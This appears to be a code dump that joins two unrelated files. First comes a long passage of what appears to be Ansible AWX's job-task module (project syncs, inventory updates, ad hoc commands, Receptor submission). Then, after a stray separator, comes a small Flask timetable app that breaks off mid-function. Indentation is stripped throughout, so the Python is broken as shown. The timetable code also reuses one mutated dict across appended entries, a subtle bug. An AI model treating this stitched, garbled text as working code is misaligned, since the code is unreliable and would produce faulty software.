git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
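# Usage sketch (the path below is hypothetical): this helper is invoked as
#   RunProjectUpdate.make_local_copy(project_update, '/tmp/awx_123_xyz')
# from RunProjectUpdate.post_run_hook and from RunInventoryUpdate.pre_run_hook
# for SCM-sourced inventory updates, so the job sees a shallow,
# revision-pinned copy of the project plus any cached roles/collections.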
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders copy to durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, isolated, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, isolated, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source in ['scm', 'custom']:
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: containers
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
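# Worked example of the path merging above (hypothetical existing value): if
# the env already carries ANSIBLE_COLLECTIONS_PATHS=/opt/collections, the
# resulting value would be
#   /runner/requirements_collections:/opt/collections:~/.ansible/collections:/usr/share/ansible/collections
# placing the collections synced into the project ahead of the defaults.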
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join('/runner', rel_path) # TODO: make container paths elegant
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join('/runner', 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
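# Illustrative command line built above (file name and id are hypothetical):
#   ansible-inventory --list --export -i /runner/inventory.gcp.yml \
#     --output /runner/artifacts/42/output.json --playbook-dir /runner -vvv
# where -vvv corresponds to an inventory update verbosity of 1.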
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = injector.filename
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
elif src == 'custom':
handle, inventory_path = tempfile.mkstemp(dir=private_data_dir)
f = os.fdopen(handle, 'w')
if inventory_update.source_script is None:
raise RuntimeError('Inventory Script does not exist')
f.write(inventory_update.source_script.script)
f.close()
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = os.path.split(inventory_path)[-1]
return rel_path
def build_cwd(self, inventory_update, private_data_dir):
"""
There is one case where the inventory "source" is in a different
location from the private data:
- SCM, where source needs to live in the project folder
"""
src = inventory_update.source
container_dir = '/runner' # TODO: make container paths elegant
if src == 'scm' and inventory_update.source_project_update:
return os.path.join(container_dir, 'project')
return container_dir
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occurred while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, isolated=False, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, isolated=isolated, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
# Create a directory for ControlPath sockets that is unique to each
# ad hoc command
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH'] = '/runner/cp'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_cwd(self, ad_hoc_command, private_data_dir):
return private_data_dir
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
def final_run_hook(self, adhoc_job, status, private_data_dir, fact_modification_times, isolated_manager_instance=None):
super(RunAdHocCommand, self).final_run_hook(adhoc_job, status, private_data_dir, fact_modification_times)
if isolated_manager_instance:
isolated_manager_instance.cleanup()
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, isolated=False, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, isolated=isolated, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_cwd(self, instance, private_data_dir):
return settings.BASE_DIR
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class AWXReceptorJob:
def __init__(self, task=None, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params['settings'].update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
try:
return self._run_internal(receptor_ctl)
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
threading.Thread(target=self.transmit, args=[sockin]).start()
# submit our work, passing
# in the right side of our socketpair for reading.
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
self.unit_id = result['unitid']
sockin.close()
sockout.close()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
# TODO: There should be a more efficient way of getting this information
receptor_work_list = receptor_ctl.simple_command("work list")
detail = receptor_work_list[self.unit_id]['Detail']
if 'exceeded quota' in detail:
logger.warning(detail)
log_name = self.task.instance.log_format
logger.warning(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing;
# writes our payload to the left side of our socketpair.
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local':
self.runner_params['only_transmit_kwargs'] = True
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
work_type = 'kubernetes-runtime-auth'
else:
work_type = 'kubernetes-incluster-auth'
else:
work_type = 'local'
return work_type
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
if self.unit_id is not None and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
time.sleep(1)
@property
def pod_definition(self):
if self.task:
ee = self.task.instance.resolve_execution_environment()
else:
ee = get_default_execution_environment()
default_pod_spec = get_default_pod_spec()
default_pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"awx-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
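# Illustrative kube_config output (hypothetical credential inputs): for a
# container group credential with host 'https://k8s.example.com' and a bearer
# token, the dict above describes a single cluster, user, and context all
# keyed by that host, with either certificate-authority-data (when verify_ssl
# and an ssl_ca_cert input are present) or insecure-skip-tls-verify: True.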
|
app.py
|
import threading
import requests
from flask import Flask, jsonify, request
from algorithm import evolutionary_algorithm
app = Flask(__name__)
def format_timetable(timetable, timetable_data, days):
course_codes = {}
for i in timetable_data["courses"]:
course_codes[i["code"]] = i["name"]
new_timetable_data = []
for period in timetable:
startHour = (period["AssignedTime"] % 9) + 9
d = {
"code": period["Subject"],
"name": course_codes[period["Subject"]],
"lecturer": period["Professor"],
"type": "theory" if period["Type"] == "Theory" else "lab",
"assignedDay": days[period["AssignedTime"] // 9],
"startHour": startHour,
"venue": period["AssignedClassroom"],
"endHour": startHour + int(period["Length"])
}
new_timetable_data.append(d)
return {"courses": new_timetable_data}
def preformat_timetable(timetable):
classes = []
for i, j in enumerate(timetable["courses"]):
class_data = {
"Subject": j["code"],
"Type": "Theory" if j["type"] == "theory" else "Practical",
"Professor": j["lecturer"],
"Groups": ["class"],
"AllowedClassrooms": [k for k in timetable["classroom"] if timetable["classroom"][k]["capacity"] >= j["students"]]
}
if j["unit"] in [1, 2]:
class_data["Length"] = str(j["unit"])
classes.append(class_data)
if j["unit"] == 3:
class_data["Length"] = "1"
classes.append(class_data)
class_data["Length"] = "2"
classes.append(class_data)
if j["unit"] == 4:
class_data["Length"] = "2"
classes.append(class_data)
class_data["Length"] = "2"
classes.append(class_data)
return classes
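# Example of the unit splitting above (hypothetical course): a 3-unit theory
# course becomes two scheduling entries, a 1-hour block and a 2-hour block,
# while a 4-unit course becomes two 2-hour blocks; AllowedClassrooms keeps
# only the rooms whose capacity covers the course's student count.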
def timetable_callback(timetable_data, api_url="https://tbe-node-deploy.herokuapp.com/timetable"):
